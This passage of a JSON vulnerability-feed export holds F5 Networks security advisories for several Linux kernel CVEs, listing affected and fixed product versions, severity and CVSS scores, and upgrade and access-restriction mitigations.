Cloud | 4.4.0 - 4.5.0 | None | High | Linux kernel - Management IPv6 addresses \nBIG-IQ Device | 4.4.0 - 4.5.0 | None | High | Linux kernel - Management IPv6 addresses \nBIG-IQ Security | 4.4.0 - 4.5.0 | None | High | Linux kernel - Management IPv6 addresses \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel - Management IPv6 addresses \nBIG-IQ Centralized Management | 6.0.0 - 6.1.0 \n5.0.0 - 5.4.0 \n4.6.0 | 7.0.0 | High | Linux kernel - Management IPv6 addresses \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel - Management IPv6 addresses \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | High | Linux kernel - Management IPv6 addresses \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.4.0 | 5.1.0 | Medium | Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2019-08-13T17:26:00", "published": "2017-07-12T18:35:00", "id": "F5:K57211290", "href": "https://support.f5.com/csp/article/K57211290", "title": "IPv6 fragmentation vulnerability CVE-2016-10142", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-06-08T00:16:20", "bulletinFamily": "software", "cvelist": ["CVE-2015-5707"], "edition": 1, "description": "\nF5 Product Development has assigned ID 553718 (BIG-IP), ID 553789 (BIG-IQ) and ID 553791 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \n \nBIG-IP AAM | 12.0.0 \n11.4.0 - 11.6.0 \n| None \n| Low | Linux Kernel \nBIG-IP AFM | 12.0.0 \n11.3.0 - 11.6.0 \n| None \n| Low | Linux Kernel \nBIG-IP Analytics | 12.0.0 \n11.0.0 - 11.6.0 \n| None \n| Low | Linux Kernel \nBIG-IP APM | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nBIG-IP ASM | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nBIG-IP DNS \n| 12.0.0 \n| None \n| Low | Linux Kernel \nBIG-IP Edge Gateway \n| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nBIG-IP GTM | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nBIG-IP Link Controller | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nBIG-IP PEM | 12.0.0 \n11.3.0 - 11.6.0 \n| None \n| Low | Linux Kernel \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \n| Low | Linux Kernel \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n \nEnterprise Manager | 3.0.0 - 3.1.1 \n| None | Low | Linux Kernel \n \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable | None \n \nBIG-IQ Cloud | 4.0.0 - 4.5.0 \n| None \n| Low | Linux Kernel \nBIG-IQ Device | 4.2.0 - 4.5.0 \n| None \n| Low | Linux Kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 \n| None \n| Low | Linux Kernel \nBIG-IQ ADC | 4.5.0 \n| None \n| Low | Linux Kernel \nLineRate | None \n| 2.5.0 - 2.6.1 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| None \n| Low | Linux Kernel \n\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nF5 recommends that you only permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13309>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:33:00", "published": "2015-10-26T19:44:00", "href": "https://support.f5.com/csp/article/K17475", "id": "F5:K17475", "title": "Linux kernel vulnerability CVE-2015-5707", "type": "f5", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-30T18:21:12", "bulletinFamily": "software", "cvelist": ["CVE-2013-7446"], "description": "\nF5 Product Development has assigned ID 570025 (BIG-IP), ID 570141 (BIG-IQ), and ID 570142 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H20022580 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP AAM| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP AFM| 12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP Analytics| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP APM| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP ASM| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP DNS| 12.0.0 - 12.1.2| 13.0.0| Medium| Linux kernel \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP Link Controller| 12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 13.0.0| Medium| Linux kernel \nBIG-IP PEM| 12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| 13.0.0| Medium| Linux kernel \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| Linux kernel \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Medium| Linux kernel \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Medium| Linux kernel \nBIG-IQ ADC| 4.5.0| None| Medium| Linux kernel \nBIG-IQ Centralized Management| 4.6.0| None| Medium| Linux kernel \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| Linux kernel \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| Linux kernel\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 13.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-05-05T09:21:00", "published": "2016-01-29T02:18:00", "id": "F5:K20022580", "href": "https://support.f5.com/csp/article/K20022580", "title": "Linux kernel vulnerability CVE-2013-7446", "type": "f5", "cvss": {"score": 5.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:07", "bulletinFamily": "software", "cvelist": ["CVE-2015-5707"], "edition": 1, "description": "Recommended Action\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nF5 recommends that you only permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/400/sol17475.html", "id": "SOL17475", "title": "SOL17475 - Linux kernel vulnerability CVE-2015-5707", "type": "f5", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T02:11:13", "bulletinFamily": "software", "cvelist": ["CVE-2015-4700"], "edition": 1, "description": " \n\n\nThe bpf_int_jit_compile function in arch/x86/net/bpf_jit_comp.c in the Linux kernel before 4.0.6 allows local users to cause a denial of service (system crash) by creating a packet filter and then loading crafted BPF instructions that trigger late convergence by the JIT compiler. ([CVE-2015-4700](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4700>))\n\nImpact \n\n\nThere is no impact; F5 products are not affected by this vulnerability.\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:23:00", "published": "2015-10-17T02:35:00", "id": "F5:K17445", "href": "https://support.f5.com/csp/article/K17445", "title": "Linux kernel vulnerability CVE-2015-4700", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:39:24", "bulletinFamily": "software", "cvelist": ["CVE-2017-5970"], "description": "\nF5 Product Development has assigned ID 651741 (BIG-IP) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H60104355 on the **Diagnostics** > **Identified** > **High** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP AAM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | High | Linux kernel \nBIG-IP AFM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | High | Linux kernel \nBIG-IP Analytics | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP APM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP ASM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP DNS | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 | High | Linux kernel \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.0 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | High | Linux kernel \nBIG-IP PEM | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | High | Linux kernel \nBIG-IP PSM | None | 11.4.0 - 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | 14.0.0 \n13.0.0 - 13.1.0 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.1.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 14.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n**Impact of action:** Performing the suggested mitigation should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n", "edition": 1, "modified": "2018-12-17T22:52:00", "published": "2017-04-19T00:09:00", "id": "F5:K60104355", "href": "https://support.f5.com/csp/article/K60104355", "title": "Linux kernel vulnerability CVE-2017-5970", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-09-26T17:23:25", "bulletinFamily": "software", "cvelist": ["CVE-2013-7446"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network and limit shell access to trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-01-28T00:00:00", "published": "2016-01-28T00:00:00", "id": "SOL20022580", "href": "http://support.f5.com/kb/en-us/solutions/public/k/20/sol20022580.html", "type": "f5", "title": "SOL20022580 - Linux kernel vulnerability CVE-2013-7446", "cvss": {"score": 5.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2020-04-06T22:39:56", "bulletinFamily": "software", "cvelist": ["CVE-2016-8399"], "description": "\nF5 Product Development has assigned IDs 652516 and 695072 (BIG-IP), ID 669855 (BIG-IQ), ID 669854 (Enterprise Manager), and ID 673043 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H23030550 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP AAM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP Analytics | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | Linux kernel \nBIG-IP GTM | 11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP PEM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 \n11.5.5 | Medium | Linux kernel \nBIG-IP PSM | 11.4.1 - 11.4.1 | None | Medium | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | Medium | Linux kernel \nBIG-IP WebSafe | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 14.1.0 \n14.0.0.3 \n13.1.1 \n13.1.0.8 \n12.1.3 \n11.6.2 - 11.6.3 | Medium | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | Medium | Linux kernel \nBIG-IQ Centralized Management | 6.0.0 - 6.1.0 \n5.0.0 - 5.4.0 \n4.6.0 | 7.0.0 | Medium | Linux kernel \nBIG-IQ Cloud | 4.4.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Device | 4.4.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Security | 4.4.0 - 4.5.0 | None | Medium | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | Medium | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.3.0 | None | Medium | Linux kernel \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2019-08-13T17:29:00", "published": "2017-07-11T23:15:00", "id": "F5:K23030550", "href": "https://support.f5.com/csp/article/K23030550", "title": "Linux kernel vulnerability CVE-2016-8399", "type": "f5", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-14T00:35:03", "bulletinFamily": "software", "cvelist": ["CVE-2017-6074"], "description": "\nF5 Product Development has assigned IDs 648215 and 648217 (BIG-IP), ID 649194 (BIG-IQ), ID 649192 (Enterprise Manager), and ID 649568 (F5 iWorkflow) to this vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 \n | Medium | Linux kernel \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP APM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP ASM | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel \nBIG-IP DNS | 13.0.0 \n12.0.0 - 12.1.2 | 13.0.0 HF1 \n12.1.2 HF1 \n | Medium | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 | None | Medium | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.5.5 | Medium | Linux kernel \nBIG-IP Link Controller | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 HF1 \n12.1.2 HF1 \n11.5.5 | Medium | Linux kernel 